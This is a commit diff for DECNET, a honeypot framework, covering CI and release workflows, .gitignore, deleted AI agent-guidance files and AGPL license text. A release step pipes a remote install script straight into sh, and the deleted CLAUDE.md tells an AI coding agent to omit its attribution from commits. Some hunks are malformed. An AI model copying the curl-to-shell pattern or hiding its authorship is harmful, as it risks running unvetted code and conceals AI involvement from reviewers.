docs: update README to reflect current codebase state

Rewrites the architecture section for the full current module tree and adds new sections for the REST API, swarm/agent mode, service bus, attacker intelligence stack (profiler, clustering, correlation, GeoIP/ASN), MazeNET topology, canary tokens, and TTP tagging/export. Updates the CLI reference table, test count (478 → 5050), and Python version constraints.
chore: relicense to AGPL-3.0-or-later and add SPDX headers
2026-05-26 00:57:40 -04:00 · 2026-05-22 21:04:16 -04:00 · 2026-05-22 18:29:33 -04:00 · 2026-05-22 18:14:50 -04:00 · 2026-05-22 17:50:26 -04:00 · 2026-05-22 16:44:17 -04:00
1900 changed files with 257815 additions and 8811 deletions
--- a/.gitea/workflows/ci.yml
+++ b/.gitea/workflows/ci.yml
@@ -2,7 +2,7 @@ name: CI
 on:
  push:
-    branches: [dev, testing, "temp/merge-*"]
+    branches: [dev, testing]
    paths-ignore:
      - "**/*.md"
      - "docs/**"
@@ -11,28 +11,31 @@ jobs:
  lint:
    name: Lint (ruff)
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/dev'
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: "3.11"
      - run: pip install ruff
-      - run: ruff check .
+      - run: ruff check decnet/
  bandit:
    name: SAST (bandit)
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/dev'
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: "3.11"
      - run: pip install bandit
-      - run: bandit -r decnet/ -ll -x decnet/services/registry.py
+      - run: bandit -r decnet/ -ll -x decnet/services/registry.py -x decnet/templates/
  pip-audit:
    name: Dependency audit (pip-audit)
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/dev'
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
@@ -40,57 +43,12 @@ jobs:
          python-version: "3.11"
      - run: pip install pip-audit
      - run: pip install -e .[dev]
-      - run: pip-audit --skip-editable
+      - run: pip-audit --skip-editable --ignore-vuln CVE-2025-65896 --ignore-vuln CVE-2026-3219
  test-standard:
    name: Test (Standard)
    runs-on: ubuntu-latest
    needs: [lint, bandit, pip-audit]
    strategy:
      matrix:
        python-version: ["3.11", "3.12"]
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python-version }}
      - run: pip install -e .[dev]
      - run: pytest
  test-live:
    name: Test (Live)
    runs-on: ubuntu-latest
    needs: [test-standard]
    strategy:
      matrix:
        python-version: ["3.11"]
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python-version }}
      - run: pip install -e .[dev]
      - run: pytest -m live
  test-fuzz:
    name: Test (Fuzz)
    runs-on: ubuntu-latest
    needs: [test-live]
    strategy:
      matrix:
        python-version: ["3.11"]
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python-version }}
      - run: pip install -e .[dev]
      - run: pytest -m fuzz
  merge-to-testing:
    name: Merge dev → testing
    runs-on: ubuntu-latest
-    needs: [test-standard, test-live, test-fuzz]
+    needs: [lint, bandit, pip-audit]
    if: github.ref == 'refs/heads/dev'
    steps:
      - uses: actions/checkout@v4
@@ -105,13 +63,63 @@ jobs:
        run: |
          git fetch origin testing
          git checkout testing
-          git merge origin/dev --no-ff -m "ci: auto-merge dev → testing [skip ci]"
+          git merge origin/dev --no-ff -m "ci: auto-merge dev → testing"
          git push origin testing
-  prepare-merge-to-main:
+  test-standard:
-    name: Prepare Merge to Main
+    name: Test (Standard)
    runs-on: ubuntu-latest
-    needs: [test-standard, test-live, test-fuzz]
+    if: github.ref == 'refs/heads/testing'
    strategy:
      matrix:
        python-version: ["3.11"]
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python-version }}
      - run: pip install -e .[dev]
      - run: pytest
  test-live:
    name: Test (Live)
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/testing'
    needs: [test-standard]
    services:
      mysql:
        image: mysql:8.0
        env:
          MYSQL_ROOT_PASSWORD: root
          MYSQL_DATABASE: decnet_test
        ports:
          - 3307:3306
        options: >-
          --health-cmd="mysqladmin ping -h 127.0.0.1"
          --health-interval=10s
          --health-timeout=5s
          --health-retries=5
    strategy:
      matrix:
        python-version: ["3.11"]
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: ${{ matrix.python-version }}
      - run: pip install -e .[dev]
      - run: pytest -m live
        env:
          DECNET_MYSQL_HOST: 127.0.0.1
          DECNET_MYSQL_PORT: 3307
          DECNET_MYSQL_USER: root
          DECNET_MYSQL_PASSWORD: root
          DECNET_MYSQL_DATABASE: decnet_test
  merge-to-main:
    name: Merge testing → main
    runs-on: ubuntu-latest
    needs: [test-standard, test-live]
    if: github.ref == 'refs/heads/testing'
    steps:
      - uses: actions/checkout@v4
@@ -122,33 +130,12 @@ jobs:
        run: |
          git config user.name "DECNET CI"
          git config user.email "ci@decnet.local"
-      - name: Create temp branch and sync with main
+      - name: Merge testing into main
        run: |
          git fetch origin main
          git checkout -b temp/merge-testing-to-main
          echo "--- Switched to temp branch, merging main into it ---"
          git merge origin/main --no-edit || { echo "CONFLICT: Manual resolution required"; exit 1; }
          git push origin temp/merge-testing-to-main --force
  finalize-merge-to-main:
    name: Finalize Merge to Main
    runs-on: ubuntu-latest
    needs: [test-standard, test-live, test-fuzz]
    if: startsWith(github.ref, 'refs/heads/temp/merge-')
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
          token: ${{ secrets.DECNET_PR_TOKEN }}
      - name: Configure git
        run: |
          git config user.name "DECNET CI"
          git config user.email "ci@decnet.local"
      - name: Merge RC into main
        run: |
          git fetch origin main
          git checkout main
-          git merge ${{ github.ref }} --no-ff -m "ci: auto-merge testing → main"
+          git merge origin/testing --no-ff -m "ci: auto-merge testing → main" || {
            echo "CONFLICT: testing and main have diverged — manual resolution required"
            exit 1
          }
          git push origin main
          echo "--- Cleaning up temp branch ---"
          git push origin --delete ${{ github.ref_name }}
--- a/.gitea/workflows/release.yml
+++ b/.gitea/workflows/release.yml
@@ -33,13 +33,13 @@ jobs:
        id: version
        run: |
          # Calculate next version (v0.x)
-          LATEST_TAG=$(git describe --tags --abbrev=0 2>/dev/null || echo "v0.0")
+          LATEST_TAG=$(git describe --tags --abbrev=0 2>/dev/null || echo "v0.0.0")
          NEXT_VER=$(python3 -c "
          tag = '$LATEST_TAG'.lstrip('v')
          parts = tag.split('.')
          major = int(parts[0]) if parts[0] else 0
          minor = int(parts[1]) if len(parts) > 1 else 0
-          print(f'{major}.{minor + 1}')
+          print(f'{major}.{minor + 1}.0')
          ")
          echo "Next version: $NEXT_VER (calculated from $LATEST_TAG)"
@@ -49,7 +49,11 @@ jobs:
          git add pyproject.toml
          git commit -m "chore: auto-release v$NEXT_VER [skip ci]" || echo "No changes to commit"
-          git tag -a "v$NEXT_VER" -m "Auto-release v$NEXT_VER"
+          CHANGELOG=$(git log ${LATEST_TAG}..HEAD --oneline --no-decorate --no-merges)
          git tag -a "v$NEXT_VER" -m "Auto-release v$NEXT_VER
 Changes since $LATEST_TAG:
 $CHANGELOG"
          git push origin main --follow-tags
          echo "version=$NEXT_VER" >> $GITHUB_OUTPUT
@@ -111,13 +115,13 @@ jobs:
          cache-from: type=gha
          cache-to: type=gha,mode=max
      - name: Install Trivy
        run: |
          curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
      - name: Scan with Trivy
-        uses: aquasecurity/trivy-action@master
+        run: |
-        with:
+          trivy image --exit-code 1 --severity CRITICAL --ignore-unfixed decnet-${{ matrix.service }}:scan
          image-ref: decnet-${{ matrix.service }}:scan
          exit-code: "1"
          severity: CRITICAL
          ignore-unfixed: true
      - name: Push image
        if: success()
--- a/.gitignore
+++ b/.gitignore
@@ -1,6 +1,11 @@
 .venv/
 .venv*/
 docker-compose.yaml
 .311/
 .3[0-9][0-9]/
 logs/
-.claude/
+.claude/*
 CLAUDE.md
 __pycache__/
 *.pyc
 *.pyo
@@ -8,9 +13,12 @@ __pycache__/
 dist/
 build/
 decnet-compose.yml
 # Per-topology compose fragments emitted by `decnet topology deploy`.
 decnet-topology-*-compose.yml
 # Docker build context cache.
 .docker/
 decnet-state.json
 *.ini
 .env
 decnet.log*
 *.loggy
 *.nmap
@@ -18,8 +26,48 @@ linterfails.log
 webmail
 windows1
 *.db
 *.db-shm
 *.db-wal
 decnet.*.log
 # Rotated copies (logrotate appends .1, .2, .gz...) — the existing
 # decnet.*.log glob doesn't catch the suffix.
 decnet.*.log.*
 decnet.json
-.env
+.env*
 .env.local
 .coverage
 .hypothesis/
 profiles/*
 tests/test_decnet.db*
 # Nested git clone of the wiki — not a submodule, just a local
 # working copy so we can edit docs without a full round-trip.
 wiki-checkout/
 # Scratch test/debug outputs that leak from saved `pytest > hang.log`
 # or `pytest > schem` redirections.
 hang.log
 schem
 *.pytest.log
 # pydeps-style dependency graph dumps from local analysis runs.
 deps.txt
 # Node modules vendored under decnet/canary/ for the obfuscator helper.
 # The package.json is the source of truth; modules are reinstalled at
 # build/deploy time.
 node_modules/
 package-lock.json
 # TTP rule-precision corpus pulled from prod sqlite. Real attacker
 # payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
 # files alongside ARE committed and exercise the harness in CI.
 tests/ttp/rule_precision/corpus/*.jsonl
 !tests/ttp/rule_precision/corpus/seed_*.jsonl
 threatfox-api.json
 # MITRE ATT&CK STIX bundle — 50 MB, fetched at runtime via attack_stix.py
 enterprise-attack-*.json
 # pytest failure dump files
 testfail
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -1,58 +0,0 @@
 # CLAUDE.md
 This file provides guidance to Claude Code (claude.ai/code) when working with code in this repository.
 ## Commands
 ```bash
 # Install (dev)
 pip install -e .
 # List registered service plugins
 decnet services
 # Dry-run (generates compose, no containers)
 decnet deploy --mode unihost --deckies 3 --randomize-services --dry-run
 # Full deploy (requires root for MACVLAN)
 sudo decnet deploy --mode unihost --deckies 5 --interface eth0 --randomize-services
 sudo decnet deploy --mode unihost --deckies 3 --services ssh,smb --log-target 192.168.1.5:5140
 # Status / teardown
 decnet status
 sudo decnet teardown --all
 sudo decnet teardown --id decky-01
 ```
 ## Project Overview
 DECNET is a honeypot/deception network framework. It deploys fake machines (called **deckies**) with realistic services (RDP, SMB, SSH, FTP, etc.) to lure and profile attackers. All attacker interactions are aggregated to an isolated logging network (ELK stack / SIEM).
 ## Deployment Models
 **UNIHOST** — one real host spins up _n_ deckies via a container orchestrator. Simpler, single-machine deployment.
 **SWARM (MULTIHOST)** — _n_ real hosts each running deckies. Orchestrated via Ansible/sshpass or similar tooling.
 ## Core Technology Choices
 - **Containers**: Docker Compose is the starting point but other orchestration frameworks should be evaluated if they serve the project better. `debian:bookworm-slim` is the default base image; mixing in Ubuntu, CentOS, or other distros is encouraged to make the decoy network look heterogeneous.
 - **Networking**: Deckies need to appear as real machines on the LAN (own MACs/IPs). MACVLAN and IPVLAN are candidates; the right driver depends on the host environment. WSL has known limitations — bare metal or a VM is preferred for testing.
 - **Log pipeline**: Logstash → ELK stack → SIEM (isolated network, not reachable from decoy network)
 ## Architecture Constraints
 - The decoy network must be reachable from the outside (attacker-facing).
 - The logging/aggregation network must be isolated from the decoy network.
 - A publicly accessible real server acts as the bridge between the two networks.
 - Deckies should differ in exposed services and OS fingerprints to appear as a heterogeneous network.
 - **IMPORTANT**: The system now strictly enforces dependency injection for storage. Do not import `SQLiteRepository` directly in new features; instead, use `get_repository()` from the factory or the FastAPI `get_repo` dependency.
 ## Development and testing
 - For every new feature, pytests must be made.
 - Pytest is the main testing framework in use.
 - NEVER pass broken code to the user.
    - Broken means: not running, not passing 100% tests, etc.
 - After tests pass with 100%, always git commit your changes.
 - NEVER add "Co-Authored-By" or any Claude attribution lines to git commit messages.
--- a/17
+++ b/17
@@ -0,0 +1,17 @@
 DECNET - Deception Network
 Copyright (C) 2026 Samuel Paschuan <samsam70000@gmail.com>
 This program is free software: you can redistribute it and/or modify
 it under the terms of the GNU Affero General Public License as
 published by the Free Software Foundation, either version 3 of the
 License, or (at your option) any later version.
 This program is distributed in the hope that it will be useful, but
 WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 Affero General Public License for more details.
 You should have received a copy of the GNU Affero General Public
 License along with this program. If not, see <https://www.gnu.org/licenses/>.
 SPDX-License-Identifier: AGPL-3.0-or-later
--- a/GEMINI.md
+++ b/GEMINI.md
@@ -1,104 +0,0 @@
 # DECNET (Deception Network) Project Context
 DECNET is a high-fidelity honeypot framework designed to deploy heterogeneous fleets of fake machines (called **deckies**) that appear as real hosts on a local network.
 ## Project Overview
 - **Core Purpose:** To lure, profile, and log attacker interactions within a controlled, deceptive environment.
 - **Key Technology:** Linux-native container networking (MACVLAN/IPvlan) combined with Docker to give each decoy its own MAC address, IP, and realistic TCP/IP stack behavior.
 - **Main Components:**
  - **Deckies:** Group of containers sharing a network namespace (one base container + multiple service containers).
  - **Archetypes:** Pre-defined machine profiles (e.g., `windows-workstation`, `linux-server`) that bundle services and OS fingerprints.
  - **Services:** Modular honeypot plugins (SSH, SMB, RDP, etc.) built as `BaseService` subclasses.
  - **OS Fingerprinting:** Sysctl-based TCP/IP stack tuning to spoof OS detection (nmap).
  - **Logging Pipeline:** RFC 5424 syslog forwarding to an isolated SIEM/ELK stack.
 ## Technical Stack
 - **Language:** Python 3.11+
 - **CLI Framework:** [Typer](https://typer.tiangolo.com/)
 - **Data Validation:** [Pydantic v2](https://docs.pydantic.dev/)
 - **Orchestration:** Docker Engine 24+ (via Docker SDK for Python)
 - **Networking:** MACVLAN (default) or IPvlan L2 (for WiFi/restricted environments).
 - **Testing:** Pytest (100% pass requirement).
 - **Formatting/Linting:** Ruff, Bandit (SAST), pip-audit.
 ## Architecture
 ```text
 Host NIC (eth0)
  └── MACVLAN Bridge
        ├── Decky-01 (192.168.1.10) -> [Base] + [SSH] + [HTTP]
        ├── Decky-02 (192.168.1.11) -> [Base] + [SMB] + [RDP]
        └── ...
 ```
 - **Base Container:** Owns the IP/MAC, sets `sysctls` for OS spoofing, and runs `sleep infinity`.
 - **Service Containers:** Use `network_mode: service:<base>` to share the identity and networking of the base container.
 - **Isolation:** Decoy traffic is strictly separated from the logging network.
 ## Key Commands
 ### Development & Maintenance
 - **Install (Dev):** 
    - `rm .venv -rf`
    - `python3 -m venv .venv`
    - `source .venv/bin/activate`
    - `pip install -e .`
 - **Run Tests:** `pytest` (Run before any commit)
 - **Linting:** `ruff check .`
 - **Security Scan:** `bandit -r decnet/`
 - **Web Git:** git.resacachile.cl (Gitea)
 ### CLI Usage
 - **List Services:** `decnet services`
 - **List Archetypes:** `decnet archetypes`
 - **Dry Run (Compose Gen):** `decnet deploy --deckies 3 --randomize-services --dry-run`
 - **Deploy (Full):** `sudo .venv/bin/decnet deploy --interface eth0 --deckies 5 --randomize-services`
 - **Status:** `decnet status`
 - **Teardown:** `sudo .venv/bin/decnet teardown --all`
 ## Development Conventions
 - **Code Style:** 
  - Strict adherence to Ruff/PEP8.
  - **Always use typed variables**. If any untyped variables are found, they must be corrected.
    - The correct way is `x: int = 1`, never `x : int = 1`.
    - If assignment is present, always use a space between the type and the equal sign `x: int = 1`.
  - **Never** use lowercase L (l), uppercase o (O) or uppercase i (I) in single-character names.
  - **Internal vars are to be declared with an underscore** (_internal_variable_name).
  - **Internal to internal vars are to be declared with double underscore** (__internal_variable_name).
  - Always use snake_case for code.
  - Always use PascalCase for classes and generics.
 - **Testing:** New features MUST include a `pytest` case. 100% test pass rate is mandatory before merging.
 - **Plugin System:**
  - New services go in `decnet/services/<name>.py`.
  - Subclass `decnet.services.base.BaseService`.
  - The registry uses auto-discovery; no manual registration required.
 - **Configuration:**
  - Use Pydantic models in `decnet/config.py` for any new settings.
  - INI file parsing is handled in `decnet/ini_loader.py`.
 - **State Management:**
  - Runtime state is persisted in `decnet-state.json`.
  - Do not modify this file manually.
 - **General Development Guidelines**:
  - **Never** commit broken code, and never commit before running `pytest` and `bandit` at the project level.
  - **No matter how small** the changes, they must be committed.
  - **If new features are added**, new tests must be added, too.
  - **Never present broken code to the user**. Test, validate, then present.
  - **Extensive testing** for every function must be created.
  - **Always develop in the `dev` branch, never in `main`.**
  - **Test in the `testing` branch.**
  - **IMPORTANT**: The system now strictly enforces dependency injection for storage. Do not import `SQLiteRepository` directly in new features; instead, use `get_repository()` from the factory or the FastAPI `get_repo` dependency.
 ## Directory Structure
 - `decnet/`: Main source code.
  - `services/`: Honeypot service implementations.
  - `logging/`: Syslog formatting and forwarding logic.
  - `correlation/`: (In Progress) Logic for grouping attacker events.
 - `templates/`: Dockerfiles and entrypoint scripts for services.
 - `tests/`: Pytest suite.
 - `pyproject.toml`: Dependency and entry point definitions.
 - `CLAUDE.md`: Claude-specific environment guidance.
 - `DEVELOPMENT.md`: Roadmap and TODOs.
--- a/661
+++ b/661
@@ -0,0 +1,661 @@
                    GNU AFFERO GENERAL PUBLIC LICENSE
                       Version 3, 19 November 2007
 Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.
                            Preamble
  The GNU Affero General Public License is a free, copyleft license for
 software and other kinds of works, specifically designed to ensure
 cooperation with the community in the case of network server software.
  The licenses for most software and other practical works are designed
 to take away your freedom to share and change the works.  By contrast,
 our General Public Licenses are intended to guarantee your freedom to
 share and change all versions of a program--to make sure it remains free
 software for all its users.
  When we speak of free software, we are referring to freedom, not
 price.  Our General Public Licenses are designed to make sure that you
 have the freedom to distribute copies of free software (and charge for
 them if you wish), that you receive source code or can get it if you
 want it, that you can change the software or use pieces of it in new
 free programs, and that you know you can do these things.
  Developers that use our General Public Licenses protect your rights
 with two steps: (1) assert copyright on the software, and (2) offer
 you this License which gives you legal permission to copy, distribute
 and/or modify the software.
  A secondary benefit of defending all users' freedom is that
 improvements made in alternate versions of the program, if they
 receive widespread use, become available for other developers to
 incorporate.  Many developers of free software are heartened and
 encouraged by the resulting cooperation.  However, in the case of
 software used on network servers, this result may fail to come about.
 The GNU General Public License permits making a modified version and
 letting the public access it on a server without ever releasing its
 source code to the public.
  The GNU Affero General Public License is designed specifically to
 ensure that, in such cases, the modified source code becomes available
 to the community.  It requires the operator of a network server to
 provide the source code of the modified version running there to the
 users of that server.  Therefore, public use of a modified version, on
 a publicly accessible server, gives the public access to the source
 code of the modified version.
  An older license, called the Affero General Public License and
 published by Affero, was designed to accomplish similar goals.  This is
 a different license, not a version of the Affero GPL, but Affero has
 released a new version of the Affero GPL which permits relicensing under
 this license.
  The precise terms and conditions for copying, distribution and
 modification follow.
                       TERMS AND CONDITIONS
  0. Definitions.
  "This License" refers to version 3 of the GNU Affero General Public License.
  "Copyright" also means copyright-like laws that apply to other kinds of
 works, such as semiconductor masks.
  "The Program" refers to any copyrightable work licensed under this
 License.  Each licensee is addressed as "you".  "Licensees" and
 "recipients" may be individuals or organizations.
  To "modify" a work means to copy from or adapt all or part of the work
 in a fashion requiring copyright permission, other than the making of an
 exact copy.  The resulting work is called a "modified version" of the
 earlier work or a work "based on" the earlier work.
  A "covered work" means either the unmodified Program or a work based
 on the Program.
  To "propagate" a work means to do anything with it that, without
 permission, would make you directly or secondarily liable for
 infringement under applicable copyright law, except executing it on a
 computer or modifying a private copy.  Propagation includes copying,
 distribution (with or without modification), making available to the
 public, and in some countries other activities as well.
  To "convey" a work means any kind of propagation that enables other
 parties to make or receive copies.  Mere interaction with a user through
 a computer network, with no transfer of a copy, is not conveying.
  An interactive user interface displays "Appropriate Legal Notices"
 to the extent that it includes a convenient and prominently visible
 feature that (1) displays an appropriate copyright notice, and (2)
 tells the user that there is no warranty for the work (except to the
 extent that warranties are provided), that licensees may convey the
 work under this License, and how to view a copy of this License.  If
 the interface presents a list of user commands or options, such as a
 menu, a prominent item in the list meets this criterion.
  1. Source Code.
  The "source code" for a work means the preferred form of the work
 for making modifications to it.  "Object code" means any non-source
 form of a work.
  A "Standard Interface" means an interface that either is an official
 standard defined by a recognized standards body, or, in the case of
 interfaces specified for a particular programming language, one that
 is widely used among developers working in that language.
  The "System Libraries" of an executable work include anything, other
 than the work as a whole, that (a) is included in the normal form of
 packaging a Major Component, but which is not part of that Major
 Component, and (b) serves only to enable use of the work with that
 Major Component, or to implement a Standard Interface for which an
 implementation is available to the public in source code form.  A
 "Major Component", in this context, means a major essential component
 (kernel, window system, and so on) of the specific operating system
 (if any) on which the executable work runs, or a compiler used to
 produce the work, or an object code interpreter used to run it.
  The "Corresponding Source" for a work in object code form means all
 the source code needed to generate, install, and (for an executable
 work) run the object code and to modify the work, including scripts to
 control those activities.  However, it does not include the work's
 System Libraries, or general-purpose tools or generally available free
 programs which are used unmodified in performing those activities but
 which are not part of the work.  For example, Corresponding Source
 includes interface definition files associated with source files for
 the work, and the source code for shared libraries and dynamically
 linked subprograms that the work is specifically designed to require,
 such as by intimate data communication or control flow between those
 subprograms and other parts of the work.
  The Corresponding Source need not include anything that users
 can regenerate automatically from other parts of the Corresponding
 Source.
  The Corresponding Source for a work in source code form is that
 same work.
  2. Basic Permissions.
  All rights granted under this License are granted for the term of
 copyright on the Program, and are irrevocable provided the stated
 conditions are met.  This License explicitly affirms your unlimited
 permission to run the unmodified Program.  The output from running a
 covered work is covered by this License only if the output, given its
 content, constitutes a covered work.  This License acknowledges your
 rights of fair use or other equivalent, as provided by copyright law.
  You may make, run and propagate covered works that you do not
 convey, without conditions so long as your license otherwise remains
 in force.  You may convey covered works to others for the sole purpose
 of having them make modifications exclusively for you, or provide you
 with facilities for running those works, provided that you comply with
 the terms of this License in conveying all material for which you do
 not control copyright.  Those thus making or running the covered works
 for you must do so exclusively on your behalf, under your direction
 and control, on terms that prohibit them from making any copies of
 your copyrighted material outside their relationship with you.
  Conveying under any other circumstances is permitted solely under
 the conditions stated below.  Sublicensing is not allowed; section 10
 makes it unnecessary.
  3. Protecting Users' Legal Rights From Anti-Circumvention Law.
  No covered work shall be deemed part of an effective technological
 measure under any applicable law fulfilling obligations under article
 11 of the WIPO copyright treaty adopted on 20 December 1996, or
 similar laws prohibiting or restricting circumvention of such
 measures.
  When you convey a covered work, you waive any legal power to forbid
 circumvention of technological measures to the extent such circumvention
 is effected by exercising rights under this License with respect to
 the covered work, and you disclaim any intention to limit operation or
 modification of the work as a means of enforcing, against the work's
 users, your or third parties' legal rights to forbid circumvention of
 technological measures.
  4. Conveying Verbatim Copies.
  You may convey verbatim copies of the Program's source code as you
 receive it, in any medium, provided that you conspicuously and
 appropriately publish on each copy an appropriate copyright notice;
 keep intact all notices stating that this License and any
 non-permissive terms added in accord with section 7 apply to the code;
 keep intact all notices of the absence of any warranty; and give all
 recipients a copy of this License along with the Program.
  You may charge any price or no price for each copy that you convey,
 and you may offer support or warranty protection for a fee.
  5. Conveying Modified Source Versions.
  You may convey a work based on the Program, or the modifications to
 produce it from the Program, in the form of source code under the
 terms of section 4, provided that you also meet all of these conditions:
    a) The work must carry prominent notices stating that you modified
    it, and giving a relevant date.
    b) The work must carry prominent notices stating that it is
    released under this License and any conditions added under section
    7.  This requirement modifies the requirement in section 4 to
    "keep intact all notices".
    c) You must license the entire work, as a whole, under this
    License to anyone who comes into possession of a copy.  This
    License will therefore apply, along with any applicable section 7
    additional terms, to the whole of the work, and all its parts,
    regardless of how they are packaged.  This License gives no
    permission to license the work in any other way, but it does not
    invalidate such permission if you have separately received it.
    d) If the work has interactive user interfaces, each must display
    Appropriate Legal Notices; however, if the Program has interactive
    interfaces that do not display Appropriate Legal Notices, your
    work need not make them do so.
  A compilation of a covered work with other separate and independent
 works, which are not by their nature extensions of the covered work,
 and which are not combined with it such as to form a larger program,
 in or on a volume of a storage or distribution medium, is called an
 "aggregate" if the compilation and its resulting copyright are not
 used to limit the access or legal rights of the compilation's users
 beyond what the individual works permit.  Inclusion of a covered work
 in an aggregate does not cause this License to apply to the other
 parts of the aggregate.
  6. Conveying Non-Source Forms.
  You may convey a covered work in object code form under the terms
 of sections 4 and 5, provided that you also convey the
 machine-readable Corresponding Source under the terms of this License,
 in one of these ways:
    a) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by the
    Corresponding Source fixed on a durable physical medium
    customarily used for software interchange.
    b) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by a
    written offer, valid for at least three years and valid for as
    long as you offer spare parts or customer support for that product
    model, to give anyone who possesses the object code either (1) a
    copy of the Corresponding Source for all the software in the
    product that is covered by this License, on a durable physical
    medium customarily used for software interchange, for a price no
    more than your reasonable cost of physically performing this
    conveying of source, or (2) access to copy the
    Corresponding Source from a network server at no charge.
    c) Convey individual copies of the object code with a copy of the
    written offer to provide the Corresponding Source.  This
    alternative is allowed only occasionally and noncommercially, and
    only if you received the object code with such an offer, in accord
    with subsection 6b.
    d) Convey the object code by offering access from a designated
    place (gratis or for a charge), and offer equivalent access to the
    Corresponding Source in the same way through the same place at no
    further charge.  You need not require recipients to copy the
    Corresponding Source along with the object code.  If the place to
    copy the object code is a network server, the Corresponding Source
    may be on a different server (operated by you or a third party)
    that supports equivalent copying facilities, provided you maintain
    clear directions next to the object code saying where to find the
    Corresponding Source.  Regardless of what server hosts the
    Corresponding Source, you remain obligated to ensure that it is
    available for as long as needed to satisfy these requirements.
    e) Convey the object code using peer-to-peer transmission, provided
    you inform other peers where the object code and Corresponding
    Source of the work are being offered to the general public at no
    charge under subsection 6d.
  A separable portion of the object code, whose source code is excluded
 from the Corresponding Source as a System Library, need not be
 included in conveying the object code work.
  A "User Product" is either (1) a "consumer product", which means any
 tangible personal property which is normally used for personal, family,
 or household purposes, or (2) anything designed or sold for incorporation
 into a dwelling.  In determining whether a product is a consumer product,
 doubtful cases shall be resolved in favor of coverage.  For a particular
 product received by a particular user, "normally used" refers to a
 typical or common use of that class of product, regardless of the status
 of the particular user or of the way in which the particular user
 actually uses, or expects or is expected to use, the product.  A product
 is a consumer product regardless of whether the product has substantial
 commercial, industrial or non-consumer uses, unless such uses represent
 the only significant mode of use of the product.
  "Installation Information" for a User Product means any methods,
 procedures, authorization keys, or other information required to install
 and execute modified versions of a covered work in that User Product from
 a modified version of its Corresponding Source.  The information must
 suffice to ensure that the continued functioning of the modified object
 code is in no case prevented or interfered with solely because
 modification has been made.
  If you convey an object code work under this section in, or with, or
 specifically for use in, a User Product, and the conveying occurs as
 part of a transaction in which the right of possession and use of the
 User Product is transferred to the recipient in perpetuity or for a
 fixed term (regardless of how the transaction is characterized), the
 Corresponding Source conveyed under this section must be accompanied
 by the Installation Information.  But this requirement does not apply
 if neither you nor any third party retains the ability to install
 modified object code on the User Product (for example, the work has
 been installed in ROM).
  The requirement to provide Installation Information does not include a
 requirement to continue to provide support service, warranty, or updates
 for a work that has been modified or installed by the recipient, or for
 the User Product in which it has been modified or installed.  Access to a
 network may be denied when the modification itself materially and
 adversely affects the operation of the network or violates the rules and
 protocols for communication across the network.
  Corresponding Source conveyed, and Installation Information provided,
 in accord with this section must be in a format that is publicly
 documented (and with an implementation available to the public in
 source code form), and must require no special password or key for
 unpacking, reading or copying.
  7. Additional Terms.
  "Additional permissions" are terms that supplement the terms of this
 License by making exceptions from one or more of its conditions.
 Additional permissions that are applicable to the entire Program shall
 be treated as though they were included in this License, to the extent
 that they are valid under applicable law.  If additional permissions
 apply only to part of the Program, that part may be used separately
 under those permissions, but the entire Program remains governed by
 this License without regard to the additional permissions.
  When you convey a copy of a covered work, you may at your option
 remove any additional permissions from that copy, or from any part of
 it.  (Additional permissions may be written to require their own
 removal in certain cases when you modify the work.)  You may place
 additional permissions on material, added by you to a covered work,
 for which you have or can give appropriate copyright permission.
  Notwithstanding any other provision of this License, for material you
 add to a covered work, you may (if authorized by the copyright holders of
 that material) supplement the terms of this License with terms:
    a) Disclaiming warranty or limiting liability differently from the
    terms of sections 15 and 16 of this License; or
    b) Requiring preservation of specified reasonable legal notices or
    author attributions in that material or in the Appropriate Legal
    Notices displayed by works containing it; or
    c) Prohibiting misrepresentation of the origin of that material, or
    requiring that modified versions of such material be marked in
    reasonable ways as different from the original version; or
    d) Limiting the use for publicity purposes of names of licensors or
    authors of the material; or
    e) Declining to grant rights under trademark law for use of some
    trade names, trademarks, or service marks; or
    f) Requiring indemnification of licensors and authors of that
    material by anyone who conveys the material (or modified versions of
    it) with contractual assumptions of liability to the recipient, for
    any liability that these contractual assumptions directly impose on
    those licensors and authors.
  All other non-permissive additional terms are considered "further
 restrictions" within the meaning of section 10.  If the Program as you
 received it, or any part of it, contains a notice stating that it is
 governed by this License along with a term that is a further
 restriction, you may remove that term.  If a license document contains
 a further restriction but permits relicensing or conveying under this
 License, you may add to a covered work material governed by the terms
 of that license document, provided that the further restriction does
 not survive such relicensing or conveying.
  If you add terms to a covered work in accord with this section, you
 must place, in the relevant source files, a statement of the
 additional terms that apply to those files, or a notice indicating
 where to find the applicable terms.
  Additional terms, permissive or non-permissive, may be stated in the
 form of a separately written license, or stated as exceptions;
 the above requirements apply either way.
  8. Termination.
  You may not propagate or modify a covered work except as expressly
 provided under this License.  Any attempt otherwise to propagate or
 modify it is void, and will automatically terminate your rights under
 this License (including any patent licenses granted under the third
 paragraph of section 11).
  However, if you cease all violation of this License, then your
 license from a particular copyright holder is reinstated (a)
 provisionally, unless and until the copyright holder explicitly and
 finally terminates your license, and (b) permanently, if the copyright
 holder fails to notify you of the violation by some reasonable means
 prior to 60 days after the cessation.
  Moreover, your license from a particular copyright holder is
 reinstated permanently if the copyright holder notifies you of the
